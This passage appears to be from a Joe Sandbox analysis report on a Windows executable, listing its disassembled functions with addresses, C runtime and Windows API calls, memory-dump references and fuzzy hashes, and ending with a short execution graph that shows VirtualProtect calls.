                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                      • ___convertcp.LIBCMT ref: 004173BA
                                                      • __freea.LIBCMT ref: 004173CF
                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                      • String ID:
                                                      • API String ID: 3809854901-0
                                                      • Opcode ID: b820e78b463918eed32479816903fc70d8532b7c557c67349a3712e4f0fad1ae
                                                      • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                      • Opcode Fuzzy Hash: b820e78b463918eed32479816903fc70d8532b7c557c67349a3712e4f0fad1ae
                                                      • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _malloc.LIBCMT ref: 004057DE
                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                      • _malloc.LIBCMT ref: 00405842
                                                      • _malloc.LIBCMT ref: 00405906
                                                      • _malloc.LIBCMT ref: 00405930
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: _malloc$AllocateHeap
                                                      • String ID: 1.2.3
                                                      • API String ID: 680241177-2310465506
                                                      • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                      • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                      • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                      • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                      • String ID:
                                                      • API String ID: 3886058894-0
                                                      • Opcode ID: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
                                                      • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                      • Opcode Fuzzy Hash: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
                                                      • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040C73D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 0040C6C8
                                                      • __fileno.LIBCMT ref: 0040C6D6
                                                      • __fileno.LIBCMT ref: 0040C6E2
                                                      • __fileno.LIBCMT ref: 0040C6EE
                                                      • __fileno.LIBCMT ref: 0040C6FE
                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                      • String ID: 'B
                                                      • API String ID: 2805327698-2787509829
                                                      • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                      • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                      • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                      • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __getptd.LIBCMT ref: 00414744
                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                      • __getptd.LIBCMT ref: 0041475B
                                                      • __amsg_exit.LIBCMT ref: 00414769
                                                      • __lock.LIBCMT ref: 00414779
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                      • String ID: @.B
                                                      • API String ID: 3521780317-470711618
                                                      • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                      • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                      • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                      • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __getptd.LIBCMT ref: 00413FD8
                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                      • __amsg_exit.LIBCMT ref: 00413FF8
                                                      • __lock.LIBCMT ref: 00414008
                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                      • InterlockedIncrement.KERNEL32(02281670), ref: 00414050
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                      • String ID:
                                                      • API String ID: 4271482742-0
                                                      • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                      • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                      • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                      • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040FA58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: __calloc_crt
                                                      • String ID: P$B$`$B
                                                      • API String ID: 3494438863-235554963
                                                      • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                      • Instruction ID: 4bdca0f49684ef71ac3198dcc3f656e5d5ce7fed137673697bf40858e87bd1f9
                                                      • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                      • Instruction Fuzzy Hash: 6011A3327446115BE7348B1DBD50F662391EB84728BA4423BE619EA7E0E77CD8864A4C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                      • API String ID: 1646373207-3105848591
                                                      • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                      • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                      • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                      • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004146FA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___addlocaleref.LIBCMT ref: 0041470C
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145F1
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145FE
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041460B
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414618
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414634
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414644
                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041465A
                                                      • ___removelocaleref.LIBCMT ref: 00414717
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 0041467B
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414688
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414695
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146A2
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146AF
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146CB
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146F1
                                                      • ___freetlocinfo.LIBCMT ref: 0041472B
                                                        • Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
                                                        • Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
                                                        • Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                      • String ID: @.B
                                                      • API String ID: 467427115-470711618
                                                      • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                      • Instruction ID: 8e9b8205a585dc9325c25650a27042e0212317e7447dcce9b0fe23aa5a8dd77f
                                                      • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                      • Instruction Fuzzy Hash: BDE0863250192255CE35261D76806EF93A98FD3725B3A017FF864AF7D8EB2C4CC0809D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __fileno.LIBCMT ref: 0040C77C
                                                      • __locking.LIBCMT ref: 0040C791
                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                      • String ID:
                                                      • API String ID: 2395185920-0
                                                      • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                      • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                      • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                      • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: _fseek_malloc_memset
                                                      • String ID:
                                                      • API String ID: 208892515-0
                                                      • Opcode ID: 689e5a2a8d0df6628a55ca55f65915ee6a0b33bdec45a2b9390eeacb6c5b01b1
                                                      • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                      • Opcode Fuzzy Hash: 689e5a2a8d0df6628a55ca55f65915ee6a0b33bdec45a2b9390eeacb6c5b01b1
                                                      • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __flush.LIBCMT ref: 0040BB6E
                                                      • __fileno.LIBCMT ref: 0040BB8E
                                                      • __locking.LIBCMT ref: 0040BB95
                                                      • __flsbuf.LIBCMT ref: 0040BBC0
                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                      • String ID:
                                                      • API String ID: 3240763771-0
                                                      • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                      • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                      • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                      • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                      • __isleadbyte_l.LIBCMT ref: 00415307
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                      • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                      • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                      • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                      • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:12.8%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:14
                                                      Total number of Limit Nodes:0
                                                      execution_graph 1887 2220c10 1888 2220c19 1887->1888 1891 22232bf 1887->1891 1894 222266f 1887->1894 1897 22292c0 1891->1897 1896 22292c0 VirtualProtect 1894->1896 1895 222268e 1896->1895 1899 22292d3 1897->1899 1901 2229378 1899->1901 1902 22293c0 VirtualProtect 1901->1902 1904 22232d8 1902->1904 1883 2229548 1884 2229588 FindCloseChangeNotification 1883->1884 1886 22295b9 1884->1886

                                                      Executed Functions

                                                      Function 02229378 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 2229378-22293f9 VirtualProtect 3 2229402-2229427 0->3 4 22293fb-2229401 0->4 4->3
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 022293EC
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646374393.0000000002220000.00000040.00000800.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2220000_audio.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
